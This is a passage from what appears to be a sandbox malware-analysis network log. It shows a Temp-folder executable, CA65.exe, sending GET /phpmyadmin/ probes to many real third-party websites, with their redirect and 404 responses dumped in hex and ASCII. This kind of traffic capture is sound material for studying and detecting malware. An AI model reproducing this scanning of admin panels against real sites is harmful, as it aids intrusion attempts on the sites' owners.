2023-12-22 20:14:53 UTC	13786	IN	Data Raw: 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 22 3e 0a 09 3c 6c 61 62 65 6c 3e 0a 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 3e 43 65 72 63 61 3a 3c 2f 73 70 61 6e 3e 0a 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 69 65 6c 64 22 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 43 65 72 63 61 20 26 68 65 6c 6c 69 70 3b 22 20 76 61 6c 75 65 3d 22 22 20 6e 61 6d 65 3d 22 73 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 0a 09 09 09 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 Data Ascii: lass="search-form" action="https://saltdelcolom.com/"><label><span class="screen-reader-text">Cerca:</span><input type="search" class="search-field" placeholder="Cerca …" value="" name="s" tabindex="-1"></label><input type="submit"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	55016	35.197.165.27	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	186	OUT	GET /phpmyadmin/ HTTP/1.1 Host: conquestaccounting.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	394	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Fri, 22 Dec 2023 20:14:51 GMT server: LiteSpeed location: https://www.conquestaccounting.com.au/phpmyadmin/ alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:51 UTC	707	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	55194	172.98.192.36	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: dl-it.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	356	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Fri, 22 Dec 2023 20:14:52 GMT location: http://ww1.dl-it.net server: Cowboy set-cookie: sid=c34f72bf-a106-11ee-9e58-812958b9f68c; path=/; domain=.dl-it.net; expires=Wed, 09 Jan 2092 23:28:59 GMT; max-age=2147483647; secure; HttpOnly
2023-12-22 20:14:52 UTC	11	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	55014	217.146.69.50	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: pistik.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	259	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache / ZoneOS Connection: Upgrade, close Last-Modified: Mon, 23 Oct 2023 21:31:51 GMT ETag: "1d7b-60868f3479039" Accept-Ranges: bytes Content-Length: 7547 Content-Type: text/html
2023-12-22 20:14:51 UTC	7547	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	54453	66.254.66.55	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ireland-ventures.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	163	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 209 Connection: close
2023-12-22 20:14:51 UTC	209	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	54464	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	443	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Content-Security-Policy: frame-ancestors 'self'; Location: https://www.fotoestudiomiret.com/phpmyadmin/ Content-Length: 252 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:51 UTC	252	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.fotoestudiomiret.com/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	54303	116.90.51.60	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fuckyoufriday.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	1354	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 set-cookie: apbct_timestamp=1703276092; path=/; secure; HttpOnly; SameSite=Lax set-cookie: apbct_site_landing_ts=1703276092; path=/; secure; HttpOnly; SameSite=Lax set-cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax set-cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522386088ab6fd0d957c8f94219f9fefb6d%2522%257D; path=/; secure; HttpOnly; SameSite=Lax set-cookie: apbct_urls=%7B%22fuckyoufriday.com.au%2Fphpmyadmin%2F%22%3A%5B1703276092%5D%7D; expires=Mon, 25-Dec-2023 20:14:52 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; secure; HttpOnly; SameSite=Lax set-cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25-Dec-2023 20:14:52 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; secure; HttpOnly; SameSite=Lax set-cookie: ct_sfw_pass_key=e069c2df4180b2c12608affc9bf7d5e00; expires=Sun, 21-Jan-2024 20:14:52 GMT; Max-Age=2592000; path=/; secure; SameSite=Lax expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://fuckyoufriday.com.au/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked
2023-12-22 20:14:53 UTC	299	IN	Data Raw: 64 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 32 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 76 61 72 79 3a 20 55 73 65 72 2d 41 67 65 6e 74 0d 0a 72 65 66 65 72 72 65 72 2d 70 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 65 72 72 65 72 2d 77 68 65 6e 2d 64 6f 77 6e 67 72 61 64 65 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 20 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 20 68 33 2d 51 30 35 30 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 20 68 33 2d 51 30 34 36 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 20 68 33 2d 51 30 34 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 Data Ascii: date: Fri, 22 Dec 2023 20:14:52 GMTserver: LiteSpeedvary: User-Agentreferrer-policy: no-referrer-when-downgradealt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=259
2023-12-22 20:14:53 UTC	14709	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 63 6b 79 6f 75 66 72 69 64 61 79 2e 63 6f 6d 2e 61 75 2f 78 6d 6c 72 70 Data Ascii: 10000<!DOCTYPE html><html lang="en-AU"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="https://fuckyoufriday.com.au/xmlrp
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d Data Ascii: -border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 3b 0a 46 3d 47 26 26 77 3f 79 28 29 7c 7c 28 22 43 53 53 31 43 6f 6d 70 61 74 22 3d 3d 47 2e 63 6f 6d 70 61 74 4d 6f 64 65 3f 70 61 72 73 65 49 6e 74 28 44 2c 31 30 29 3a 35 29 3a 76 6f 69 64 20 30 3b 76 61 72 20 49 3b 69 66 28 21 28 49 3d 21 78 26 26 21 77 29 29 7b 76 61 72 20 4a 3b 69 66 28 4a 3d 77 29 4a 3d 39 3c 3d 4e 75 6d 62 65 72 28 46 29 3b 49 3d 4a 7d 49 7c 7c 78 26 26 45 28 22 31 2e 39 2e 31 22 29 3b 77 26 26 45 28 22 39 22 29 3b 76 61 72 20 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 4b 3b 74 72 79 7b 76 61 72 20 62 3b 69 66 28 62 3d 21 21 61 26 26 6e 75 6c 6c 21 3d 61 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 61 3a 7b 74 72 79 7b 76 28 61 2e 66 6f 6f 29 3b 62 3d 21 30 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 63 29 7b 7d 62 Data Ascii: ;F=G&&w?y()\|\|("CSS1Compat"==G.compatMode?parseInt(D,10):5):void 0;var I;if(!(I=!x&&!w)){var J;if(J=w)J=9<=Number(F);I=J}I\|\|x&&E("1.9.1");w&&E("9");var L=function(){var a=K;try{var b;if(b=!!a&&null!=a.location.href)a:{try{v(a.foo);b=!0;break a}catch(c){}b
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 65 61 72 63 68 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 69 6e 70 75 74 20 0a 20 20 20 20 20 20 20 20 69 64 3d 22 61 70 62 63 74 5f 73 75 62 6d 69 74 5f 69 64 5f 5f 73 65 61 72 63 68 5f 66 6f 72 6d 5f 38 38 39 33 38 22 20 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 61 70 62 63 74 5f 73 70 65 63 69 61 6c 5f 66 69 65 6c 64 20 61 70 62 63 74 5f 5f 65 6d 61 69 6c 5f 69 64 5f 5f 73 65 61 72 63 68 5f 66 6f 72 6d 22 0a 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 61 70 62 63 74 5f 73 75 62 6d 69 74 5f 69 64 5f 5f 73 65 61 72 63 68 5f 66 6f 72 6d 5f 38 38 39 33 38 22 20 20 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 0a 20 20 20 20 20 20 20 20 61 70 62 63 74 5f 65 76 65 6e 74 5f 69 64 3d 22 38 38 39 33 38 22 0a 20 20 20 Data Ascii: earch</span></button><input id="apbct_submit_id__search_form_88938" class="apbct_special_field apbct__email_id__search_form" name="apbct_submit_id__search_form_88938" type="submit" apbct_event_id="88938"
2023-12-22 20:14:53 UTC	1684	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 77 69 64 67 65 74 20 63 75 73 74 6f 6d 2d 68 74 6d 6c 2d 77 69 64 67 65 74 22 3e 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 73 69 7a 65 2d 6c 61 72 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 72 6b 65 77 65 6d 70 6f 72 69 75 6d 2e 63 6f 6d 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 62 65 73 74 73 65 6c 6c 65 72 73 2f 70 72 6f 64 75 63 74 73 2f 63 61 6c 6d 2d 74 68 65 2d 66 75 63 6b 2d 64 6f 77 6e 2d 63 61 6e 64 6c 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2e 77 70 2e 63 6f 6d 2f 66 75 63 6b 79 6f 75 66 72 69 64 61 79 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 31 Data Ascii: div class="textwidget custom-html-widget"><figure class="wp-block-image size-large"><a href="https://farkewemporium.com/collections/bestsellers/products/calm-the-fuck-down-candle"><img src="https://i2.wp.com/fuckyoufriday.com.au/wp-content/uploads/2020/01
2023-12-22 20:14:53 UTC	1368	IN	Data Raw: 35 37 66 0d 0a 61 53 63 72 65 65 6e 52 65 61 64 65 72 54 65 78 74 20 3d 20 7b 22 65 78 70 61 6e 64 22 3a 22 45 78 70 61 6e 64 20 63 68 69 6c 64 20 6d 65 6e 75 22 2c 22 63 6f 6c 6c 61 70 73 65 22 3a 22 43 6f 6c 6c 61 70 73 65 20 63 68 69 6c 64 20 6d 65 6e 75 22 2c 22 69 63 6f 6e 22 3a 22 3c 73 76 67 20 63 6c 61 73 73 3d 5c 22 69 63 6f 6e 20 69 63 6f 6e 2d 65 78 70 61 6e 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 3d 5c 22 69 6d 67 5c 22 3e 20 3c 75 73 65 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 63 6b 79 6f 75 66 72 69 64 61 79 2e 63 6f 6d 2e 61 75 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 74 68 65 6d 65 73 5c 2f 74 6f 72 74 75 67 61 5c 2f 61 73 73 65 74 73 5c 2f 69 63 6f 6e 73 Data Ascii: 57faScreenReaderText = {"expand":"Expand child menu","collapse":"Collapse child menu","icon":"<svg class=\"icon icon-expand\" aria-hidden=\"true\" role=\"img\"> <use xlink:href=\"https:\/\/fuckyoufriday.com.au\/wp-content\/themes\/tortuga\/assets\/icons
2023-12-22 20:14:53 UTC	46	IN	Data Raw: 40 20 32 30 32 33 2d 31 32 2d 32 32 20 32 30 3a 31 34 3a 35 32 20 62 79 20 57 33 20 54 6f 74 61 6c 20 43 61 63 68 65 0d 0a 2d 2d 3e 0d 0a Data Ascii: @ 2023-12-22 20:14:52 by W3 Total Cache-->
2023-12-22 20:14:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	53815	68.178.145.3	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ismaworld.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	216	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Location: https://ismaworld.com/phpmyadmin Content-Length: 240 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:51 UTC	240	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ismaworld.com/phpmyadmin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	54888	103.42.111.169	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: geis.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:52 UTC	710	IN	HTTP/1.1 404 Not Found Connection: close X-Powered-By: PHP/8.1.26 Set-Cookie: ad4550d292dd963003562d26fd0f1c62=f7p6obkjlpt90vj0ustml86nrf; path=/; HttpOnly; secure Content-Type: text/html; charset=utf-8 Expires: Wed, 17 Aug 2005 00:00:00 GMT Last-Modified: Fri, 22 Dec 2023 20:14:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Litespeed-Cache: miss Content-Length: 1667 Date: Fri, 22 Dec 2023 20:14:52 GMT Server: LiteSpeed X-Content-Type-Options: nosniff Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
2023-12-22 20:14:52 UTC	1667	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 67 62 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 67 65 69 73 2d 32 30 32 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 Data Ascii: <!DOCTYPE html><html lang="en-gb" dir="ltr"><head> <meta charset="utf-8"><meta name="generator" content="Joomla! - Open Source Content Management"><title>404 - Page not found</title><link href="/templates/geis-2023/favicon.ico" rel="shortcut i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	55133	89.46.108.50	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
